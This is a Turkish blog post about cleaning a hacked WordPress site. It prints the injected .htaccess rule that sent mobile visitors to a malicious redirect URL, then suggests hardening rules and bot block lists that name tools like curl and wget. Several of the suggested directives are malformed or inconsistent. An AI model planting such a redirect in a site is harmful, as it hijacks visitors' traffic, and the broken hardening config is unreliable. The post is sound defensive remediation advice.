spot_img
9.4 C
İstanbul
spot_img
Ana SayfaGenelWordpress Eallyhrenewsop.buzz Sorunu

WordPress Eallyhrenewsop.buzz Sorunu

Arkadaşlar ikazlarınız sonrasında web siteme mobil cihazlardan ulaşmaya çalıştığımda bahsettiğiniz hataları bende aldım. Web siteme saldırı olmuş ve htaccess dosyam zarara uğratılmış. Sorun değil bunun tespitini yaptım. Web siteme mobil cihazımdan girdiğimde sitemin enteresan sitelere yönlendirildiğini gördüm. Yönlendirilen siteler reklam siteleri idi ve haksız bir kazanç sağlamak adına benim trafiğimi kullanıyorlardı. 

Sitemin htacces dosyası şu linke yönlendirilecek şekilde zararlı kod saldırısına uğramış; http://crazytds.club/redirect.php . Bu link ise birkaç farklı siteye uğradıktan sonra en son https://moststraightmoment-4.live/ bu sitede reklamları karşıma çıkarıyordu.

Sorunun Çözümü

Sitenize ait olan .htaccess dosyasını açarak aşağıdaki kod paragrafını bularak siliyoruz. Probleminiz çözülmüştür.

RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} android|bb\d+|meego|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge\ |maemo|midp|mmp|mobile.+firefox|netfront|opera\ m(ob|in)i|palm(\ os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows\ ce|xda|xiino [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a\ wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r\ |s\ )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1\ u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp(\ i|ip)|hs\-c|ht(c(\-|\ |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac(\ |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt(\ |\/)|klon|kpt\ |kwc\-|kyo(c|k)|le(no|xi)|lg(\ g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-|\ |o|v)|zz)|mt(50|p1|v\ )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v\ )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-|\ )|webc|whit|wi(g\ |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-) [NC]
RewriteRule ^$ http://crazytds.club/redirect.php [R,L]

Htaccess Dosyanızı Koruma Altına Almak İçin

Aşağıda ki kodları htaccess dosyanızın en altına ekleyebilirsiniz;

#Referer ddos engelliyoruz
RewriteCond %{QUERY_STRING} ^([0-9]+)$ [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)\?([0-9]+)(.*)$ [NC,OR]
RewriteCond %{QUERY_STRING} ^([0-9]+\.[0-9])(.*)$ [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)\?([0-9]+\.[0-9])(.*)$ [NC]
RewriteRule ^(.*)$ %{HTTP_REFERER} [L]
RewriteCond %{QUERY_STRING} ^ptrxcz.*$
RewriteCond% {QUERY_STRING}!^Ptrxcz.* $
RewriteRule (.*) – [F]

#XmlRPC güvenliği artırıyoruz
RewriteRule ^xmlrpc\.php$ “http\:\/\/0\.0\.0\.0\/” [R=301,L]

#Belirli spam botları engelliyoruz
RewriteCond %{HTTP:User-Agent}
RewriteCond %{HTTP_USER_AGENT} ^(aesop_com_spiderman|alexibot|backweb|bandit|batchftp|bigfoot) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(black.?hole|blackwidow|blowfish|botalot|buddy|builtbottough|bullseye) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(cheesebot|cherrypicker|chinaclaw|collector|copier|copyrightcheck) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(cosmos|crescent|curl|custo|da|diibot|disco|dittospyder|dragonfly) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(drip|easydl|ebingbong|ecatch|eirgrabber|emailcollector|emailsiphon) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(emailwolf|erocrawler|exabot|eyenetie|filehound|flashget|flunky) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(frontpage|getright|getweb|go.?zilla|go-ahead-got-it|gotit|grabnet) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(grafula|harvest|hloader|hmview|httplib|httrack|humanlinks|ilsebot) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(infonavirobot|infotekies|intelliseek|interget|iria|jennybot|jetcar) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(joc|justview|jyxobot|kenjin|keyword|larbin|leechftp|lexibot|lftp|libweb) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(likse|linkscan|linkwalker|lnspiderguy|lwp|magnet|mag-net|markwatch) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(mata.?hari|memo|microsoft.?url|midown.?tool|miixpc|mirror|missigua) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(mister.?pix|moget|mozilla.?newt|nameprotect|navroad|backdoorbot|nearsite) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(net.?vampire|netants|netcraft|netmechanic|netspider|nextgensearchbot) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(attach|nicerspro|nimblecrawler|npbot|octopus|offline.?explorer) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(offline.?navigator|openfind|outfoxbot|pagegrabber|papa|pavuk) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(pcbrowser|php.?version.?tracker|pockey|propowerbot|prowebwalker) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(psbot|pump|queryn|recorder|realdownload|reaper|reget|true_robot) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(repomonkey|rma|internetseer|sitesnagger|siphon|slysearch|smartdownload) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(snake|snapbot|snoopy|sogou|spacebison|spankbot|spanner|sqworm|superbot) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(superhttp|surfbot|asterias|suzuran|szukacz|takeout|teleport) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(telesoft|the.?intraformant|thenomad|tighttwatbot|titan|urldispatcher) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(turingos|turnitinbot|urly.?warning|vacuum|vci|voideye|whacker) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(libwww-perl|widow|wisenutbot|wwwoffle|xaldon|xenu|zeus|zyborg|anonymouse) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^web(zip|emaile|enhancer|fetch|go.?is|auto|bandit|clip|copier|master|reaper|sauger|site.?quester|whack) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(craftbot|download|extract|stripper|sucker|ninja|clshttp|webspider|leacher|collector|grabber|webpictures).*$ [NC]
RewriteRule . – [F,L]
</IfModule>

#Sunucu cache deniyoruz
<IfModule mod_cache.c>
<IfModule mod_mem_cache.c>
CacheEnable mem /
MCacheSize 4096
MCacheMaxObjectCount 100
MCacheMinObjectSize 1
MCacheMaxObjectSize 2048
</IfModule>
</IfModule>

#DEFLATE kullanıyoruz
<IfModule mod_deflate.c>
<FilesMatch “\.(html|php|txt|xml|js|css|png|jpg|jpeg)$”>
SetOutputFilter DEFLATE
</FilesMatch>
BrowserMatch ^Mozilla/4 gzip-only-text/html
BrowserMatch ^Mozilla/4\.0[678] no-gzip
BrowserMatch \bMSI[E] !no-gzip !gzip-only-text/html
Header append Vary User-Agent env=!dont-vary
</IfModule>

#GZIP ile sıkıştırıyoruz
<IfModule mod_gzip.c>
mod_gzip_on Yes
mod_gzip_dechunk Yes
mod_gzip_item_include file \.(html?|txt|css|js|php|pl)$
mod_gzip_item_include handler ^cgi-script$
mod_gzip_item_include mime ^text/.*
mod_gzip_item_include mime ^application/x-javascript.*
mod_gzip_item_exclude mime ^image/.*
mod_gzip_item_exclude rspheader ^Content-Encoding:.*gzip.*
BrowserMatch ^Mozilla/4 gzip-only-text/html
BrowserMatch ^Mozilla/4\.0[678] no-gzip
BrowserMatch \bMSI[E] !no-gzip !gzip-only-text/html
Header append Vary User-Agent env=!dont-vary
</IfModule>

# PHP5 ile sıkıştırma deniyoruz
<IfModule mod_php5.c>
php_value zlib.output_compression 16386
</IfModule>

# Bazı zararlı botları engelliyoruz

SetEnvIfNoCase User-Agent “AhrefsBot” bad_bots
SetEnvIfNoCase User-Agent “AITCSRobot” bad_bots
SetEnvIfNoCase User-Agent “Alexibot” bad_bots
SetEnvIfNoCase User-Agent “Arachnophilia” bad_bots
SetEnvIfNoCase User-Agent “archive\.org\_bot” bad_bots
SetEnvIfNoCase User-Agent “ASpider” bad_bots
SetEnvIfNoCase User-Agent “BackDoorBot” bad_bots
SetEnvIfNoCase User-Agent “BSpider” bad_bots
SetEnvIfNoCase User-Agent “CFNetwork” bad_bots
SetEnvIfNoCase User-Agent “CyberPatrol” bad_bots
SetEnvIfNoCase User-Agent “DeuSu” bad_bots
SetEnvIfNoCase User-Agent “DotBot” bad_bots
SetEnvIfNoCase User-Agent “EmailCollector” bad_bots
SetEnvIfNoCase User-Agent “Exabot” bad_bots
SetEnvIfNoCase User-Agent “FeedlyBot” bad_bots
SetEnvIfNoCase User-Agent “Genieo” bad_bots
SetEnvIfNoCase User-Agent “Gluten\ Free\ Crawler” bad_bots
SetEnvIfNoCase User-Agent “GrapeshotCrawler” bad_bots
SetEnvIfNoCase User-Agent “MaxPointCrawler” bad_bots
SetEnvIfNoCase User-Agent “meanpathbot” bad_bots
SetEnvIfNoCase User-Agent “MJ12bot” bad_bots
SetEnvIfNoCase User-Agent “PagesInventory” bad_bots
SetEnvIfNoCase User-Agent “Plukkie” bad_bots
SetEnvIfNoCase User-Agent “Qwantify” bad_bots
SetEnvIfNoCase User-Agent “SemrushBot” bad_bots
SetEnvIfNoCase User-Agent “SentiBot” bad_bots
SetEnvIfNoCase User-Agent “SEOkicks\-Robot” bad_bots
SetEnvIfNoCase User-Agent “SeznamBot” bad_bots
SetEnvIfNoCase User-Agent “spbot” bad_bots
SetEnvIfNoCase User-Agent “WeSEE\_Bot” bad_bots
SetEnvIfNoCase User-Agent “Wget” bad_bots
SetEnvIfNoCase User-Agent “worldwebheritage\.org” bad_bots
SetEnvIfNoCase User-Agent “Xenu\ Link\ Sleuth” bad_bots
SetEnvIfNoCase User-Agent “Yahoo!\ Slurp” bad_bots
SetEnvIfNoCase User-Agent “Zeus” bad_bots
SetEnvIfNoCase User-Agent “facebookexternalhit” bad_bot
SetEnvIfNoCase User-Agent “Twitterbot” bad_bot
SetEnvIfNoCase User-Agent “MetaURI” bad_bot
SetEnvIfNoCase User-Agent “mediawords” bad_bot
SetEnvIfNoCase User-Agent “FlipboardProxy” bad_bot
<Limit GET POST HEAD>
Order Allow,Deny
Allow from all
Deny from env=bad_bots
</Limit>

#injection amaçlı kullanılan bazı dosyaları engelliyoruz
<files wp-config.php>
order allow,deny
deny from all
</files>

<files wp-load.php>
order allow,deny
deny from all
</files>

<Files xmlrpc.php>
Order allow,deny
Deny from all
</Files>

spot_img

latest articles

explore more

CEVAP VER

Lütfen yorumunuzu giriniz!
Lütfen isminizi buraya giriniz

Enjoy this blog? Please spread the word :)

RSS
Follow by Email2k
INSTAGRAM